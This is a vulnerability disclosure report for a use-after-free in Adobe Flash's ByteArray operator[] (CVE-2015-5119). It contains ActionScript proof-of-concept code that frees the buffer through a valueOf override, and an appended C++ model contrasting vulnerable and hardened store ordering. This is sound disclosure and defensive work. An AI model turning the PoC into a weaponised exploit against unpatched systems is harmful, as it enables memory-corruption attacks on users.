Status: Fixed
Closed: Jul 2015
Adobe Flash: Use-after-free in ByteArray Operator[]
Reported by natashenka@google.com (Project Member), Jul 1 2015
There is a use-after-free in the ByteArray operator []. If a byte array index is set to a value with valueOf defined, this method gets called. If valueOf contains code that frees the array, such as setting its length, it will lead to a use-after-free, as the original ByteArray memory gets set as opposed to the newly allocated memory. A PoC is as follows:

    for(var i = 0; i < 1000; i++){
        var b = new ByteArray();
        b.length = 12;        // small backing buffer for b
        var n = new myba(b);  // object whose valueOf frees b's buffer by changing its length
        b[0] = n;             // operator[] calls n.valueOf() before the store completes
    }

In the myba class definition:

    prototype.valueOf = function()
    {
        b.length = 1000;      // reallocates b, freeing the buffer operator[] already resolved
        bb = new ByteArray();
        bb.length = 12;       // allocate a second ByteArray after the reallocation
        return 77;            // byte that gets written into the original (freed) memory
    }

The swf and as files are attached.

This bug is subject to a 7 day disclosure deadline, as the issue is being exploited in the wild. If 7 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
Attachments: memtest.as (478 bytes), memtest.swf (1.3 KB), myba.as (475 bytes)
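The ordering bug the report describes, modelled as an added C++ example (this is illustrative code, not Flash Player's implementation): the vulnerable store resolves the backing buffer before running the script-visible valueOf conversion, while the hardened store converts first and then re-validates the index against the possibly changed length. The ByteArray, ScriptValue and runPoc names are assumptions for the model, and instead of writing through the freed buffer the vulnerable path detects the stale pointer so the program runs safely.

```cpp
#include <cstdint>
#include <cstdio>
#include <functional>
#include <vector>

// A script value whose integer conversion may run user code (the AS3 valueOf hook).
struct ScriptValue { std::function<int()> valueOf; };
enum class Store { Ok, OutOfRange, StaleBufferDetected };

struct ByteArray {
    std::vector<std::uint8_t> data;  // backing buffer; growing it reallocates and frees the old block
    void setLength(std::size_t n) { data.resize(n); }

    // Vulnerable ordering: take the buffer and check the index first, convert the value second.
    Store storeUnsafe(std::size_t index, const ScriptValue& v) {
        if (index >= data.size()) return Store::OutOfRange;
        auto before = reinterpret_cast<std::uintptr_t>(data.data());  // pointer captured before valueOf
        int byte = v.valueOf();                                       // may resize data and free that block
        if (reinterpret_cast<std::uintptr_t>(data.data()) != before || index >= data.size())
            return Store::StaleBufferDetected;  // the real bug writes through the freed buffer here
        data[index] = static_cast<std::uint8_t>(byte);
        return Store::Ok;
    }

    // Hardened ordering: finish every script-visible conversion before touching the buffer,
    // then re-validate the index against the possibly changed length.
    Store storeSafe(std::size_t index, const ScriptValue& v) {
        int byte = v.valueOf();
        if (index >= data.size()) return Store::OutOfRange;
        data[index] = static_cast<std::uint8_t>(byte);
        return Store::Ok;
    }
};

struct PocResult { Store status; std::size_t length; int byte0; };
// Mirrors the report: b.length = 12, then b[0] = n where n.valueOf sets b.length = newLength.
PocResult runPoc(bool hardened, std::size_t newLength) {
    ByteArray b;
    b.setLength(12);
    ScriptValue n{[&b, newLength] { b.setLength(newLength); return 77; }};
    Store s = hardened ? b.storeSafe(0, n) : b.storeUnsafe(0, n);
    return {s, b.data.size(), b.data.empty() ? -1 : b.data[0]};
}

int main() {
    PocResult u = runPoc(false, 1000), s = runPoc(true, 1000);
    std::printf("unsafe: stale=%d  safe: status=%d length=%zu byte0=%d\n",
                u.status == Store::StaleBufferDetected, (int)s.status, s.length, s.byte0);
}
```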
Comment 1 by cevans@google.com, Jul 5 2015
Labels: CVE-2015-5119
Comment 2 by cevans@google.com, Jul 9 2015
Labels: -Restrict-View-Commit Fixed-2015-Jul-8
Status: Fixed
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html